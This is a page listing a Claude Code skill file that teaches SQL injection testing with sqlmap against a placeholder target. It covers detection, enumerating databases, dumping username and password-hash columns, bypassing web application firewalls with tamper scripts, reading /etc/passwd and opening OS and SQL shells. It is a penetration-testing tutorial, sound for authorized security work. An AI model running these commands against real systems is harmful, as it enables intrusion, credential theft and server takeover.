OpenSkillIndex← back to search
claude-code

Skills sqlmap

install
source · Clone the upstream repo
git clone https://github.com/TerminalSkills/skills
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/TerminalSkills/skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/sqlmap" ~/.claude/skills/terminalskills-skills-sqlmap && rm -rf "$T"
manifest: skills/sqlmap/SKILL.md
source content

sqlmap

Overview

sqlmap automates SQL injection detection and exploitation. It supports all major databases (MySQL, PostgreSQL, MSSQL, Oracle, SQLite), all injection techniques (boolean-blind, time-blind, error-based, UNION, stacked queries), and can extract entire databases, read/write files on the server, and execute OS commands through SQL injection.

Instructions

Step 1: Basic Detection

# Test a URL parameter for SQL injection
sqlmap -u "https://target.example.com/products?id=1" --batch
# --batch: use defaults for all prompts (non-interactive)

# Test POST parameters
sqlmap -u "https://target.example.com/login" \
  --data="username=admin&password=test" \
  --batch

# Test with cookies and headers (authenticated sessions)
sqlmap -u "https://target.example.com/api/user?id=1" \
  --cookie="session=abc123" \
  --headers="Authorization: Bearer eyJ..." \
  --batch

# Specify which parameter to test
sqlmap -u "https://target.example.com/search?q=test&category=1&page=1" \
  -p "category" \
  --batch

Step 2: Database Enumeration

# List all databases
sqlmap -u "https://target.example.com/products?id=1" --dbs --batch

# List tables in a database
sqlmap -u "https://target.example.com/products?id=1" \
  -D webapp_db --tables --batch

# List columns in a table
sqlmap -u "https://target.example.com/products?id=1" \
  -D webapp_db -T users --columns --batch

# Dump specific columns (e.g., credentials)
sqlmap -u "https://target.example.com/products?id=1" \
  -D webapp_db -T users -C "username,email,password_hash" --dump --batch

# Dump everything (use cautiously)
sqlmap -u "https://target.example.com/products?id=1" \
  -D webapp_db --dump-all --batch

Step 3: Advanced Techniques

# Specify injection technique
sqlmap -u "https://target.example.com/products?id=1" \
  --technique=BT --batch
# B: Boolean-blind, T: Time-blind, E: Error-based
# U: UNION, S: Stacked queries, Q: Inline queries

# Tamper scripts for WAF bypass
sqlmap -u "https://target.example.com/products?id=1" \
  --tamper=space2comment,between,randomcase \
  --random-agent --batch
# space2comment: replaces spaces with /**/
# between: replaces > with NOT BETWEEN 0 AND
# randomcase: randomizes keyword case

# Test REST API JSON parameters
sqlmap -u "https://target.example.com/api/search" \
  --data='{"query":"test","limit":10}' \
  --content-type="application/json" \
  -p "query" --batch

# Level and risk increase (deeper testing)
sqlmap -u "https://target.example.com/products?id=1" \
  --level=5 --risk=3 --batch
# level 5: tests cookies, User-Agent, Referer, all params
# risk 3: includes heavy time-blind and OR-based tests

Step 4: Post-Exploitation

# Read files from server (if DB user has FILE privilege)
sqlmap -u "https://target.example.com/products?id=1" \
  --file-read="/etc/passwd" --batch

# Get an OS shell (stacked queries + privileges needed)
sqlmap -u "https://target.example.com/products?id=1" \
  --os-shell --batch

# Get a SQL shell
sqlmap -u "https://target.example.com/products?id=1" \
  --sql-shell --batch

# Check current DB user and privileges
sqlmap -u "https://target.example.com/products?id=1" \
  --current-user --current-db --is-dba --batch

Step 5: Crawl and Test Entire Application

# Crawl the site and test all found parameters
sqlmap -u "https://target.example.com/" \
  --crawl=3 --batch --forms
# --crawl=3: follow links up to depth 3
# --forms: test HTML form parameters too

# Use a Burp/ZAP request file
sqlmap -r captured-request.txt --batch
# captured-request.txt is a raw HTTP request file

Guidelines

  • Always have written authorization. SQL injection testing against unauthorized targets is illegal.
  • Start with 
    --batch --level=1 --risk=1
    (defaults). Increase level/risk only if needed.
  • --batch
    mode is essential for automation — prevents interactive prompts.
  • Time-blind injection is slow. Use 
    --threads=10
    to speed up extraction.
  • Tamper scripts bypass WAFs. Common: 
    space2comment
    , 
    between
    , 
    charencode
    , 
    randomcase
    .
  • Use 
    -r request.txt
    with Burp Suite exported requests for complex auth flows.
  • --dump
    extracts data. In a real pentest, dump only what proves the vulnerability — not the entire database.
  • sqlmap auto-detects the DBMS. Use 
    --dbms=mysql
    to skip detection (faster).